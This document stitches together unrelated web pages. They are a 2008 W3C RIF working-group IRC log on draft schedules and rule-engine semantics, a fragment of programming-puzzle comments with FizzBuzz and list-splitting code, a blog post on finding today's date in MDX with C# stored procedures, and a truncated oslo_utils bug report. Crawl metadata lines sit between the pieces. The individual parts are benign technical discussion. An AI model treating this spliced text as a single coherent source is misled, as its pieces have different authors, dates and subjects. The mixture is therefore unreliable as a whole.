ChrisW: the whole WG is responsible to take a look as well!!! i.e. if no more complaints, jos and leora's reviews will be the last step before going the next step to LC, after jos and leora's reviews.
15:54:51 [AxelPolleres]
csma: this means, jos and leora, make clear in your review whether it is a "Go", or a "No Go"
15:55:13 [AxelPolleres]
ChrisW: same question now to jos: when do you expect to freeze SWC?
15:56:19 [AxelPolleres]
... and same for DTB, Axel?
15:56:27 [AxelPolleres]
josb: after dtb.
15:56:34 [AxelPolleres]
axel: DTB is frozen from my side.
15:57:05 [AxelPolleres]
... (for first WD), but would like to have another review, of course.
15:57:28 [AxelPolleres]
josb: SWC will be frozen by Tue, COB.
15:58:30 [AxelPolleres]
csma: I will review SWC, can give go-nogo, Tue, 15th, COB.
15:58:43 [AxelPolleres]
csma: Michael, when id FLD frozen?
15:58:59 [MichaelKifer]
zakim, unmute me
15:58:59 [Zakim]
MichaelKifer should no longer be muted
15:59:05 [AxelPolleres]
Harold: only XSD missing... will be one week form now.
15:59:31 [AxelPolleres]
Michael: we have to fix the table and force other improvements from BLD, but can be done within a week.
16:00:00 [AxelPolleres]
... after next telecon, Friday 11th.
16:00:16 [AxelPolleres]
csma: who can review?
16:00:40 [AxelPolleres]
chrisW, josb: by 15th.
16:00:56 [ChrisW]
zakkim, list agenda
16:01:04 [AxelPolleres]
csma: now what about PRD, ChrisW, pls take over chairing.
16:01:09 [ChrisW]
zakim, list agenda
16:01:09 [Zakim]
I see 4 items remaining on the agenda:
16:01:10 [Zakim]
5. Publication plans [from ChrisW]
16:01:10 [Zakim]
6. PRD [from ChrisW]
16:01:11 [Zakim]
7. ISSUE-61 (casting) [from ChrisW]
16:01:11 [Zakim]
8. AOB [from ChrisW]
16:01:17 [ChrisW]
zakim, take up item 6
16:01:17 [Zakim]
agendum 6. "PRD" taken up [from ChrisW]
16:01:25 [AxelPolleres]
TOPIC: PRD
16:01:46 [AxelPolleres]
ChrisW: discussions on the mailinglist.
16:02:23 [AxelPolleres]
... Christian, you sent a list of interim solutions for 1st WD compromises.
16:02:42 [AxelPolleres]
Gary: I had a look, sounds great.
16:03:12 [AxelPolleres]
csma: I had some things worked out already, few small edits still to implement.
16:03:45 [markproctor]
for no-loop yes.
16:03:46 [ChrisW]
zakim, who is on the phone?
16:03:46 [Zakim]
On the phone I see csma, Sandro, josb, Mike_Dean, ChrisW, StellaMitchell, LeoraMorgenstern, AxelPolleres, Hassan (muted), Gary_Hallmark, MichaelKifer, Mark_Proctor, Harold
16:03:57 [markproctor]
ORB is just built on jess.
16:04:00 [AxelPolleres]
Gary: (would you might typing in your remark yourself)
16:04:11 [MichaelKifer]
zakim, mute me
16:04:11 [Zakim]
MichaelKifer should now be muted
16:04:27 [AxelPolleres]
ChrisW: Let us discuss 1st WD schedule and then get back to details.
16:04:38 [markproctor]
end of the day it comes down to. If you change a fact and for the same rule and same matched data it re-matches do we activate or not.
16:04:50 [markproctor]
by default jrules does not.
16:05:00 [markproctor]
jess/drools/clips will re-match unless no-loop is used.
16:05:21 [AxelPolleres]
csma+Gary discussing some resolution on conditional retract/assert
16:05:33 [AxelPolleres]
csma: will have all changes implemented tomorrow.
16:05:45 [AxelPolleres]
... adrian and gary are the reviewers.
16:06:14 [AxelPolleres]
chrisW: Can you take an action to give the final go/nogo for 1st WD?
16:06:32 [ChrisW]
action: Gary to review frozen PRD WD Thursday
16:06:32 [trackbot]
Created ACTION-538 - Review frozen PRD WD Thursday [on Gary Hallmark - due 2008-07-08].
16:06:36 [AxelPolleres]
Gary: will be gone 4-20th, but can review on Thu.
16:07:09 [AxelPolleres]
ChrisW: We will have PRD frozen tomorrow and Gary giving final go/nogo for WD on Thu.
16:07:23 [AxelPolleres]
... any more technical discussions necessary?
16:07:26 [ChrisW]
discussion of "norepeat"
16:07:29 [markproctor]
ilog does 'no-repeat" as default.
16:07:47 [markproctor]
drools, jess, clips do not - you must specify the no-loop attribute for the rule.
16:08:32 [markproctor]
no you can't do that.
16:08:36 [markproctor]
you cant do it per rule
16:08:40 [markproctor]
it has to be per rule + row of data.
16:08:49 [AxelPolleres]
csma: semantics of norepeat is explained exactly like Gary wants in the current proposal.
16:08:56 [markproctor]
no rule execution, except of the data, is not really a valid use case.
16:08:57 [GaryHallmark]
16:08:57 [GaryHallmark]
"The default refraction mechanism avoids executing the same rule several times on the same object instances, even if the rule conditions are met again after a change on an object."
16:09:02 [markproctor]
hwo do I get on the phone queuue?
16:09:10 [AxelPolleres]
Gary: that doesn't seem to be what ILOG does in their implementation.
16:09:14 [markproctor]
correct - the row of data is the important bit.
16:09:15 [AxelPolleres]
csma: will check back.
16:09:56 [markproctor]
guess no more needs to be said now.
16:10:19 [markproctor]
AxelPolleres: i've never actually run JRules, so can't qualify. can just say what I've been told and read, and drawn from my own understanding of PR systems.
16:10:31 [AxelPolleres]
csma: am sure to be finished by tomorrow, apart from norepeat, may be marked in the draft.
16:11:29 [AxelPolleres]
Gary: Should we have architectural principles to minimize divergence for new dialects from BLD/Core?
16:12:31 [AxelPolleres]
... I'd like to have feedback from the non-PR people here.
16:12:56 [AxelPolleres]
ChrisW: hard to follow for the non-PR people who don't tread the whole thread in detail.
16:13:18 [AxelPolleres]
s/don't tread/didn't read/
16:13:49 [AxelPolleres]
csma: I'd urge all people to give their opinions on the PRD draft.
16:14:33 [markproctor]
did everyone get my excel file I emailed to the list?
16:14:54 [AxelPolleres]
... my view is slightly different from Gary's. My concern is more putting in balance to make the mainstream PR engine people happy over maximizing BLD overlapping.
16:15:23 [markproctor]
does it help at all? maybe we can grow it further to correct different engine capabilities.
16:15:29 [markproctor]
will help decide on features to support.
16:16:59 [markproctor]
just added no-loop to my list.
16:17:37 [ChrisW]
q?
16:17:43 [AxelPolleres]
Gary: I have a hard time giving a handle on the argument here, Clips looks pretty much like BLD, for instance.
16:17:47 [markproctor]
is there a website I can put this spreadsheet?
16:17:50 [markproctor]
or some google docs?
16:17:53 [AdrianP]
AdrianP has joined #rif
16:18:11 [josb]
use the wiki
16:18:36 [csma]
Mark, I did not have an opportunity to look at it yet. But that's certainly useful.
16:18:54 [markproctor]
csma: I apologise if anything is wrong.
16:19:02 [AxelPolleres]
ChrisW: I don't think that following PR engine people is the most relevant, let them speak for themselves within the group.
16:19:38 [markproctor]
guys you are adding language semantics now, can we move on?
16:19:44 [markproctor]
sorry s/adding/argueing/
16:20:28 [AxelPolleres]
csma: I think mark's work in his excel sheet is interesting.
16:21:00 [AxelPolleres]
... I am arguing for publishing PRD as early as possible.
16:21:01 [markproctor]
no it's fine.
16:21:14 [Harold]
Chairs, we need to come back in the ongoing telecon to freezing BLD for a moment: As has been often discussed, Equal roles need to be left and right:
16:21:15 [ChrisW]
zakim, list agenda
16:21:15 [Zakim]
I see 4 items remaining on the agenda:
16:21:17 [Zakim]
5. Publication plans [from ChrisW]
16:21:17 [Zakim]
6. PRD [from ChrisW]
16:21:18 [AxelPolleres]
ChrisW: do we have some time to talk about casting?
16:21:19 [Zakim]
7. ISSUE-61 (casting) [from ChrisW]
16:21:19 [Zakim]
8. AOB [from ChrisW]
16:21:22 [ChrisW]
zakim, take up item 7
16:21:22 [Zakim]
agendum 7. "ISSUE-61 (casting)" taken up [from ChrisW]
16:21:25 [markproctor]
ok, i'm trying to make up some wiki table now for htis
16:22:22 [AxelPolleres]
Harold: we need to split the role of LHS and RHS in equals.
16:22:26 [Adrian]
Adrian has joined #rif
16:22:54 [josb]
q+
16:23:16 [csma]
PROPOSED: Change the roles in Equal from "side" to "left" and "right" (in BLD XML)
16:23:24 [csma]
ack josb
16:23:27 [AxelPolleres]
Topic went back to BLD/XML ...
16:23:41 [josb]
-1
16:24:00 [Harold]
You cannot even say Equal(x y) = Equal(y x) without splitting side into left and right.
16:24:09 [Hassan]
Such is called a rewrite rule, Harold. So why not call it that instead of equation?
16:24:37 [Harold]
This is the job of the semantics.
16:24:44 [AxelPolleres]
Harold: reasons: we cannot talk about symmetry of equality in the semantics, if they are symmetric per definiton in the syntax.
16:24:58 [ChrisW]
q?
16:25:24 [sandro]
jos: I would not oppose changing names in *XML*.
16:25:24 [MichaelKifer]
zakim, unmute me
16:25:24 [Zakim]
MichaelKifer should no longer be muted
16:25:25 [AxelPolleres]
josb: it should be interpreted as identity.
16:25:43 [AxelPolleres]
... I don't care about BLD/XML, though.
16:25:56 [Hassan]
I favor lhs/rhs rather than side/side (actually I did from the start) ...
16:26:12 [AxelPolleres]
Harold: in PS there is a distinction between left and right of the '=' sign anyway.
16:26:20 [MichaelKifer]
zakim, mute me
16:26:20 [Zakim]
MichaelKifer should now be muted
16:26:24 [AxelPolleres]
s/Harold/Michael/
16:26:41 [AxelPolleres]
josb: then fine, if it is only in the XML syntax.
16:26:42 [markproctor]
how do I unlock a page?
16:26:51 [josb]
0 on the resolution
16:26:53 [markproctor]
created this -
16:26:59 [markproctor]
I go to edit and it says it's been locked
16:26:59 [sandro]
markproctor, you have to log in, and have a WG-enabled account.
16:27:11 [markproctor]
"This page has been locked to prevent editing. "
16:27:15 [csma]
PROPOSED: Change the tag name of the sub elements of Equal in BLD XML from side to left and right
16:27:15 [markproctor]
ah bugger
16:27:18 [AxelPolleres]
-0 (why can't we drop sides tag at all?)
16:27:20 [sandro]
"locked" is media-wiki speak for "you don't have write access"
16:27:21 [Hassan]
+1
16:27:22 [Harold]
+1
16:27:23 [markproctor]
I probably had one already, but forget what it is.
16:27:26 [MichaelKifer]
+1
16:27:27 [sandro]
+1
16:27:27 [ChrisW]
0
16:27:31 [josb]
0
16:27:36 [markproctor]
just created a new account, mdproctor
16:27:39 [josb]
(don't care)
16:28:01 [AxelPolleres]
RESOLVED: Change the tag name of the sub elements of Equal in BLD XML from side to left and right
16:28:26 [Hassan]
+1
16:28:26 [ChrisW]
+1
16:28:31 [GaryHallmark]
+1
16:28:32 [markproctor]
can someone enable mdproctor as a username? and I'll do this wiki page now?
16:28:36 [ChrisW]
zakim, list attendees
16:28:36 [Zakim]
As of this point the attendees have been csma, Sandro, +39.047.101.aaaa, josb, Mike_Dean, ChrisW, StellaMitchell, LeoraMorgenstern, AxelPolleres, +33.2.72.26.aabb, Gary_Hallmark,
16:28:40 [Zakim]
... Hassan, +1.631.833.aacc, MichaelKifer, Mark_Proctor, Harold
16:28:43 [sandro]
markproctor, you didn't have an account before. The general advice would be to use the account "Mark Proctor". spaces, etc, are fine.
16:28:51 [Zakim]
-josb
16:28:57 [ChrisW]
Regrets: AdrianPaschke PaulVincent DaveReynolds
16:28:57 [Zakim]
-Hassan
16:28:58 [Zakim]
-LeoraMorgenstern
16:29:00 [Zakim]
-StellaMitchell
16:29:01 [Zakim]
-MichaelKifer
16:29:02 [sandro]
markproctor, but mdproctor is okay, if you want.....
16:29:03 [ChrisW]
rrsagent, make minutes
16:29:03 [RRSAgent]
I have made the request to generate
ChrisW
16:29:03 [Zakim]
-Gary_Hallmark
16:29:04 [Zakim]
-Harold
16:29:05 [Zakim]
-Mike_Dean
16:29:14 [markproctor]
ah ok i already created it, sorry.
16:29:16 [csma]
zakim, who is on the call?
16:29:16 [Zakim]
On the phone I see csma, Sandro, ChrisW, AxelPolleres, Mark_Proctor
16:29:18 [markproctor]
shall I create another one?
16:29:19 [ChrisW]
zakim, who is on the phone?
16:29:19 [Zakim]
On the phone I see csma, Sandro, ChrisW, AxelPolleres, Mark_Proctor
16:29:29 [sandro]
sure, another one is fine, markproctor
16:29:48 [Zakim]
-AxelPolleres
16:31:12 [markproctor]
ok done
16:31:12 [ChrisW]
zakim, drop Mark_Proctor
16:31:12 [Zakim]
Mark_Proctor is being disconnected
16:31:13 [Zakim]
-Mark_Proctor
16:31:14 [markproctor]
created markproctor
16:31:26 [sandro]
okay, one sec
16:32:04 [sandro]
markproctor, it should work now.
16:32:36 [Zakim]
-ChrisW
16:32:37 [Zakim]
-Sandro
16:32:37 [Zakim]
-csma
16:32:38 [Zakim]
SW_RIF()11:00AM has ended
16:32:40 [Zakim]
Attendees were csma, Sandro, +39.047.101.aaaa, josb, Mike_Dean, ChrisW, StellaMitchell, LeoraMorgenstern, AxelPolleres, +33.2.72.26.aabb, Gary_Hallmark, Hassan, +1.631.833.aacc,
16:32:42 [Zakim]
... MichaelKifer, Mark_Proctor, Harold
16:33:31 [markproctor]
sandro: ok please delete mdproctor
16:33:50 [markproctor]
does anyone want me to add any other vendor columns?
16:34:02 [sandro]
I think everyone else is gone....
16:34:08 [markproctor]
I don't see a need for FIC or OBR. FIC uses OPSJ and OBR uses Jess.
16:34:10 [markproctor]
ok
16:35:48 [AxelPolleres]
Adrian?
16:39:42 [markproctor]
how do you do tables?
16:39:46 [markproctor]
the editing help page is empty
16:41:07 [markproctor]
||Clips 6.3|Jess 7.1|Drools 4.0.7|JRules ?|OPSJ ?|
16:41:09 [markproctor]
does not produce a table
16:45:24 [markproctor]
ping?
16:45:33 [markproctor]
sandro: can you help me make a table?
16:45:50 [markproctor]
tried putting { ...} brackets around the above, didn't work.
16:46:12 [markproctor]
is this a specific wiki, that I can go to to get he editing manual?
16:49:23 [markproctor]
ah its mediawiki, found docs | http://www.w3.org/2008/07/01-rif-irc | CC-MAIN-2016-36 | refinedweb | 4,726 | 72.97 |
On 2015-05-01 3:23 PM, Yury Selivanov wrote: > Let. > To further clarify on the example: class SomeIterable: def __iter__(self): return self async def __aiter__(self): return self async def __next__(self): print('hello') raise StopAsyncIteration If you pass this to 'async for' you will get 'hello' printed and the loop will be over. If you pass this to 'for', you will get an infinite loop, because '__next__' will return a coroutine object (that has to be also awaited, but it wouldn't, because it's a plain 'for' statement). This is something that we shouldn't let happen. Yury | https://mail.python.org/pipermail/python-dev/2015-May/139764.html | CC-MAIN-2017-47 | refinedweb | 102 | 65.05 |
Before we go into the details of the classes belonging to this module we want to give an overview of the different components and how they interact. We start with an example. Suppose you want to write a string to a compressed file named ``foo'' and read it back from the file. Then you can use the following program:
#include <LEDA/basics/string.h> #include <LEDA/coding/compress.h> // contains all compression classes using namespace leda; typedef HuffmanCoder Coder; int main() { string str = "Hello World"; encoding_ofstream<Coder> out("foo"); out << str << "\n"; out.close(); if (out.fail()) std::cout << "error writing foo" << "\n"; decoding_ifstream<Coder> in("foo"); str.read_line(in); in.close(); if (in.fail()) std::cout << "error reading foo" << "\n"; std::cout << "decoded string: " << str << "\n"; return 0; }
In the example above we used the classes
encoding
and
decoding
with LEDA datatypes only.
We want to emphasize that they work together with user-defined types as well.
All operations and operators (« and ») defined for C++ streams
can be applied to them, too.
Assume that you want to send the file ``foo'' to a friend over the internet and
you want to make sure that its contents do not get corrupted. Then you can
easily add a checksum to your file. All you have to do is to replace the coder
in the typedef-statement by CoderPipe2<MD5SumCoder, HuffmanCoder>.
The class
CoderPipe2 combines the two LEDA coders
MD5SumCoder (the checksummer) and
HuffmanCoder into a
single coder.
If the pipe is used for encoding, then the
MD5SumCoder is used
first and the
HuffmanCoder is applied to its output. In decoding
mode the situation is reversed.
The standard behaviour of a checksummer like MD5SumCoder is as follows: In encoding mode it reads the input stream and computes a checksum; the output data basically consists of the input data with the checksum appended. In decoding mode the checksum is stripped from the input data and verified. If the input is corrupted the failure flag of the coder is set to signal this.
Suppose further that your friend has received the encoded file ``foo'' and wants to decode it but he does not know which combination of coders you have used for encoding. This is not a problem because LEDA provides a class called AutoDecoder which can be used to decode any stream that has been encoded by LEDA. The complete code for this extended example is depicted below:
#include <LEDA/basics/string.h> #include <LEDA/coding/compress.h> using namespace leda; typedef CoderPipe2<MD5SumCoder, HuffmanCoder> Coder; int main() { string str = "Hello World"; // your code ... encoding_ofstream<Coder> out("foo"); out << str << "\n"; out.close(); if (out.fail()) std::cout << "error writing foo" << "\n"; // your friend's code ... autodecoding_ifstream in("foo"); // autodecoding_ifstream = decoding_istream<AutoDecoder> str.read_line(in); in.finish(); // read till the end before closing (-> verify checksum) if (in.fail()) std::cout << "decoding error, foo corrupted" << "\n"; std::cout << "decoded string: " << str << "\n"; return 0; }
This example shows how easy it is to add compression to existing applications:
You include the header ``LEDA/coding/compress.h'', which makes all
classes in the compression module available.
Then you simply replace every occurrence of
ofstream by
encoding
<Coder > and
every occurence of
ifstream by
autodecoding
.
Of course, you can also use the LEDA coders in file mode. This means you can encode a file ``foo'' into a file ``bar'' and decode ``bar'' again. The example below shows how. We also demonstrate a nice feature of the AutoDecoder: If you query a description after the decoding the object tells you which combination has been used for encoding the input.
#include <LEDA/coding/compress.h> using namespace leda; typedef CoderPipe2<MD5SumCoder, HuffmanCoder> Coder; int main() { Coder coder("foo", "bar"); coder.encode(); if (coder.fail()) std::cout << "error encoding foo" << "\n"; AutoDecoder auto("bar", "foo"); auto.decode(); if (auto.fail()) std::cout << "error decoding bar" << "\n"; std::cout << "Decoding info: " << auto.get_description() << "\n"; return 0; }
More examples can be found in $LEDAROOT/test/compression. There we show in particular how the user can build a LEDA compliant coder which integrates seamlessly with the AutoDecoder.
Below we give a few suggestions about when to use which coder: | http://www.algorithmic-solutions.info/leda_manual/Lossless_Compression.html | crawl-002 | refinedweb | 696 | 57.47 |
sigstack - set and/or get alternate signal stack context (LEGACY)
#include <signal.h> int sigstack(struct sigstack *ss, struct sigstack *oss);
The sigstack() function allows the calling process to indicate signal stack overflows, the resulting behaviour is undefined. (See APPLICATION USAGE below.)
- The value of the ss_onstack member indicates whether the process wants the system to use an alternate signal stack when delivering signals.
- The value of the ss_sp member indicates the desired location of the alternate signal stack area in the process' address space.
- If the ss argument is a null pointer, the current alternate signal stack context is not changed.
If the oss argument is not a null pointer, it points to a sigstack structure in which the current alternate signal stack context is placed. The value stored in the ss_onstack member of oss will be non-zero if the process is currently executing on the alternate signal stack. If the oss argument is a null pointer, the current alternate signal stack context is not returned.
When a signal's action indicates its handler should execute on the alternate signal stack (specified by calling sigaction()), the implementation checks to see if the process is currently executing on that stack. If the process is not currently executing on the alternate signal stack, the system arranges a switch to the alternate signal stack for the duration of the signal handler's execution.
After a successful call to one of the exec functions, there are no alternate signal stacks in the new process image. direction of stack growth is not indicated in the historical definition of struct sigstack. The only way to portably establish a stack pointer is for the application to determine stack growth direction, or to allocate a block of storage and set the stack pointer to the middle.>. | http://pubs.opengroup.org/onlinepubs/7990989799/xsh/sigstack.html | CC-MAIN-2019-30 | refinedweb | 300 | 50.16 |
.
My try in REXX
[...] today’s Programming Praxis exercise, our goal is to write three fucntions: FizzBuzz, a function to [...]
My Haskell solution (see for a version with comments):
my implementation in c
Solution in Python (for simple tests look at github):
I have been trying to learn macros , so here is my code
using predicate dispatch paper, implemented using macros.
@Vikas Tandi – how about PrimeWords(“3″) and PrimeWords(“2″) :)
Oh and in my code instead of:
should be
My solution to “FizzBuzz”: write a generator “fizzer()” that accepts an argument list of the “fizz-buzz” parameters.
This is how you call it:
This is the output:
@arturasl – Thanks for pointing that out :(
This check should be added after decimal conversion
My Python solution, with multiple answers for each.
Some of it isn’t original, but I’m most proud of my list splitting and my use of Horner’s Method for
converting a word to a base 36 number (though Python’s
int()provides all the functionality we need,
anyway).
Here’s ruby versions of each. FizzBuzz is unimaginative, prime words is OK, split_list works for arrays, but I feel like it could be better.
@Graham – is_prime_word_horner will not work if you pass it word with digits:
Anyway neat solution, especially the usage of all() and reduce() q:-)
Here is an attempt in python
number = input(‘What number would you like to count to? ‘) + 1
whole = 0
fizzz = 0
buzzz = 0
def whole_number(num):
global whole
if num % 1 == 0:
whole = 1
else:
whole = 0
def fizz(num):
global fizzz
if num % 3 == 0:
fizzz = 1
else:
fizzz = 0
def buzz(num):
global buzzz
if num % 5 == 0:
buzzz = 1
else:
buzzz = 0
for N in range(1,number,1):
whole_number(N)
fizz(N)
buzz(N)
if fizzz is 1 and buzzz is 1:
print(‘FizzBuzz’)
elif buzzz is 1 and fizzz is 0:
print(‘Buzz’)
elif buzzz is 0 and fizzz is 1:
print(‘Fizz’)
else:
print(N)
Sorry I dont know how to retain the indentation and code look
Ryan Take a look at. That should explain how to format your code. I was going to paste it in, but I’m pretty sure it wouldn’t do what I want.
@arturasl: Thanks for catching that. I only thought to work with letters, basing my
ord(y) - 55
off of the offset for the letters A through Z…Like I said, the use of Python’s integer
conversion is probably the preferred method—in this case, the only correct method :-)
—that I came up with. Thanks again!
A non-destructive solution without using reverse (in case that’s cheating):
(define (split xs)
(let loop ((xs xs) (rest xs))
(if (or (null? rest) (null? (cdr rest)))
(values ‘() xs)
(let-values (((first second) (loop (cdr xs) (cddr rest))))
(values (cons (car xs) first) second)))))
Err, I’ll try formatted:
Here’s my 2 cents:
FizzBuzz
Thought I’d do something different than the standard if-elif-type answer.
Prime Words
isprime() is from a prior exercise
Split A List
Uses deques to efficiently add/pop items from either end.
Basic idea is add each item in the list to the end of the ‘back’ half. Every other time an item is added to the back, an item
is popped off the front of the ‘back’ half and added to the ‘front’ half.
Tested in MIT Scheme
praxis.scm
Here’s my Ruby solution:
I feel I cheated a bit with my solution for the 3rd assignment because I’m not scanning the list in situ. Oh well… =)
Simple Haskell for FizzBuzz.
run n = mapM_ putStrLn $ take n $ zipWith (\a b -> if null b then show a else b) [1..] $ zipWith (++) (cycle ["","","Fizz"]) (cycle ["","","","","Buzz"])
Scheme.
In a table, I store a continuation that builds a list made of 1/ what’s on the stack, and 2/ what you give it, as well as the current rest of the list. Each time I scan one more element of the list, I put it on the stack (with CONS) and call myself recursively, after setting the continuation and the rest of the list in the table. When the list is empty, compute the middle index, fetch the continuation and rest at this time, save the rest somewhere, and call the continuation with ‘() to return the list up to the middle. Then assemble everything and you’re done. Lists of length 0 and 1 are edge cases.
(define (split l)
(define table (make-table))
(define cnt 0)
(define bottom '())
(define (aux l)
(if (null? l)
(case cnt
((0 1) '())
(else
(let* ((mid (floor (/ cnt 2)))
(val (table-ref table mid)))
(set! bottom (cdr val))
((car val) '()))))
(begin
(set! cnt (+ cnt 1))
(cons (car l)
(call/cc
(lambda (build-top)
(table-set! table cnt (cons build-top (cdr l)))
(aux (cdr l))))))))
(let ((res (aux l)))
(vector res bottom)))
Morally the same as above, but cleaner. Uses a hack (?) from gambit (4.2.8 in my test), the fact that ((lambda(x) x) (values a b)) will effectively return the two values.
(define (split l)
(define (aux l #!optional (table (make-table)) (cnt 1))
(if (null? l)
(let* ((mid (floor (/ cnt 2)))
(val (table-ref table mid (cons (lambda (x) x) '()))))
((car val) (values '() (cdr val))))
(call-with-values
(lambda ()
(call/cc
(lambda (build-top)
(table-set! table cnt (cons build-top (cdr l)))
(aux (cdr l) table (+ 1 cnt)))))
(lambda (val bot)
(values (cons (car l) val) bot)))))
(aux l)) | http://programmingpraxis.com/2011/04/26/miscellanea/?like=1&source=post_flair&_wpnonce=20ee2ea151 | CC-MAIN-2014-42 | refinedweb | 918 | 75.64 |
THE SQL Server Blog Spot on the Web
The question in the title of this post is a popular one. There are many scenarios, where it is desirable to navigate to the member of the Time hierarchy which corresponds to the current day, month or year. Sometimes, there is a desire to set the default member to be aligned with the current date. It is especially relevant, when the Time dimension contains non aggregatable attribute, such as Year (i.e. there is no member 'All Years'). By default, Analysis Services sets the default member to one of the years, but which one is undefined. So rather then override it with static member such as [Time].[Year].[2005], one may want to point to the current year. Another common scenario is around KPICurrentTime property, which is often set to today's day. Or, perhaps, calculations in the cube need to refer to today's date etc.
Usually, when this question is asked, the typical answer involves calls to VBA functions Now() or Date() combined with some clever formatting (which usually requires additional VBA functions such as Format, CStr, CDate, Month, Year, Quarter, Day etc) to build a string which looks like either fully qualified or even unique member name and then feed it to StrToMember MDX function. While these solutions do usually work, I am not fond of them. Building manually an unique member name goes against the spirit of MDX, since unique names are provider specific and have no specific format. But even building fully qualified member name is dangerous, especially in solutions which freely use ampersand sign (&) as a prefix for member key - certainly undocumented behavior. Finally, I really dislike StrToMember function for many reasons. For the havoc it wrecks in the query optimizer, for the unpredictable caching guarantees, for the very dynamic binding by means of reparsing its input.
The alternative that I propose is instead of trying to build a member name in the specific format - scan the members for the match with current date. Let's demonstrate this with the examples from Adventure Works. We will perform the following steps:
1. Obtain today's date using VBA!Date function
2. Since this article is written in 2007 and Adventure Works's Time dimension goes only as far as 2004, we will go 4 years back using DateAdd function, to get into year 2003.
3. Go over all the days and look for one which has MemberValue the same as today's (four years ago) date. In properly designed Time dimension, the Date's member value will be of type DateTime.
4. There should be no more than one tuple in the result set if the Time dimension was properly design, so take the first tuple of the set, which will be the desired member, or NULL if the result set came empty.
The MDX expression which does it will look the following:
Due to a bug in the blogging software, the literal Date in square brackets cannot be used in the blog post, therefore here and later I replaced it with [Date_] instead. If you will be trying these examples, please change it back by removing _.
Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = vba!dateadd("yyyy", -4, vba)).Item(0)
Or to use it in MDX query to see results
select {} on 0,Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = vba!dateadd("yyyy", -4, vba)) on 1from [Adventure Works]
There aren't many days in the Time dimension. Even if we kept 10 years in the cube, there would be no more than 3660 days. Running Filter over such a small number of members is instantaneous. However, we do note, that for every single day we call VBA function, which seems redundant, since the the current date is a constant. Moreover, it is somewhat dangerous, since if we were to run this query in the evening, at 11:59pm, the result of VBA!Date function could change in the middle of execution ! To prevent that the query can be rewritten as
with member Measures.Today as vba!dateadd("yyyy", -4, vba)
select {} on 0
,Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = ([Date_].[Calendar].[All Periods],Today)) on 1from [Adventure Works]
this is quite a common trick - shift coordinate to constant member (i.e. All Periods) in order to make Filter to request same coordinate - ([Date_].[Calendar].[All Periods],Today) for every iteration. This way the hope is that it will be computed only first time, and cached afterwards. Even better way to do it is to write
with member Measures.Today as vba!dateadd("yyyy", -4, vba)select {} on 0,Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = Root(Today)) on 1from [Adventure Works]
Here, by using Root(Today) we shift coordinates in all dimensions and attributes to the constant, so even if we had more axes in the query, or other coordinate shifting calculations, they won't matter, and VBA!Date would be called only once.
Similar trick can be done also inside MDX Script. It relies on the fact that named sets are static and computed only once. Therefore, the MDX Script could contain the following line:
CREATE HIDDEN TodayDate = vba!dateadd("yyyy", -4, vba);
CREATE SET Today AS Filter([Date_].[Calendar].[Date_], [Date_].[Calendar].MemberValue = ([Date_].[Calendar].[All Periods],TodayDate));
And afterwards, whenever we need to reference today's date - we would use Today.Item(0), or even shorter notation of Today(0).
The catch here is that evaluated MDX Script is cached, so unless there is some sort of refresh to the cube, the named set Today won't change from day to day and will become outdated. But as long as new data is loaded into cube daily - it will be OK, since any kind of processing will trigger reevaluation of MDX Script.
Yet another solution for the scenarios where application cannot depend on the specific MDX Script, is to use stored procedures. While it won't be as performant as previous one, it could be more universal.
Below is the code of stored procedures which returns today's day:
public Member GetToday(Level lvl)
{
// Get today's date from the system
System.DateTime today = System.DateTime.Today;
System.DateTime fouryearsago = today.AddYears(-4);
// The only way to get set out of the level. Direct cast won't work
Expression lvlexp = new Expression(lvl.UniqueName);
Set lvlset = (Set)lvlexp.CalculateMdxObject(null);
// Build the string in the form
// [Date_].[Calendar].[Date_].MemberValue = CDate("5/21/2007")
Expression exp = new Expression(
lvl.ParentHierarchy.UniqueName
+ ".MemberValue = CDate(\""
+ fouryearsago.GetDateTimeFormats('d')[0]
+ "\")");
Set filterset = MDX.Filter(lvlset, exp);
// Iterate only one step - this is better then checking
// the count and indexing the 0's item
foreach (Tuple t in filterset.Tuples)
return t.Members[0];
// If today's date wasn't found - return NULL member
// Since Member object doesn't have ctor - this is the only way
Expression nullmbr = new Expression("NULL");
return (Member)nullmbr.CalculateMdxObject(null);
}
Due to several limitations of AdomdServer object model, there is an excessive use of Expression object in the code above. It could've been much simpler if the Member object exposed MemberValue property, because then none of the dynamically built expressions would've been needed, and CDate wouldn't have to be evaluated over and over again. Simple loop over lvl.GetMembers() comparing value of today variable with Member.MemberValue would've done the job. Alas, not in current version. The typical call to such sproc would look like
select {} on 0
,ASSP.ASStoredProcs.Util.GetToday([Date_].[Calendar].[Date_]) on 1
from [Adventure Works]
The sproc requires passing the level as its argument, but this can be improved too. The version below finds the Day level in the cube automatically:
public Member GetToday()
{
CubeDef cb = Context.CurrentCube;
Dimension timedim = null;
foreach (Dimension dim in cb.Dimensions)
{
if (dim.DimensionType == DimensionTypeEnum.Time)
{
timedim = dim;
break;
}
}
if (null == timedim)
throw new System.ArgumentException("No Time dimension in the cube");
foreach (Hierarchy h in timedim.Hierarchies)
{
foreach (Level lvl in h.Levels)
{
if (lvl.LevelType == LevelTypeEnum.TimeDays)
return GetToday(lvl);
}
}
throw new System.ArgumentException("No Day level in the Time dimension");
}
This sproc will work with the simpler call, like this one
select {} on 0,ASSP.ASStoredProcs.Util.GetToday() on 1from [Adventure Works]
However, in cube like Adventure Works which have multiple Time dimensions, sproc will return member from the random one. Also, it turns out that there is a slight mismatch between AMO attribute types and ADOMD.NET level types, so marking Date attribute with type 'Date' in AMO will translate into type 'Regular' in ADOMD.NET. (And Adventure Works cube has a small bug, the level that gets marked with Day type is the 'Day Name' which really should be marked as DayOfWeek type).
So we saw several different methods of determining the current date through MDX. But none of them is ideal. They all rely on the non-deterministic VBA functions such as Now and Date, which can have really bad caching implications. So the best solution, which is also the simplest one in terms of MDX, is to have a dedicated process, which will update MDX Script daily with the following line:
CREATE SET Today AS { [Date_].[Calendar].[Date_].[May 21, 2003] };
Where the name of today's date is hardcoded and changed every day. This will have the best performance, but it will also add a little management burden on the cube maintainer. | http://sqlblog.com/blogs/mosha/archive/2007/05/23/how-to-get-the-today-s-date-in-mdx.aspx | CC-MAIN-2014-15 | refinedweb | 1,577 | 56.55 |
secretutils.constant_time_compare raise a exception
Bug Description
see follow code:
```python
import hmac
from oslo_utils import secretutils
first = hmac.new(
second = hmac.new(
print secretutils.
```
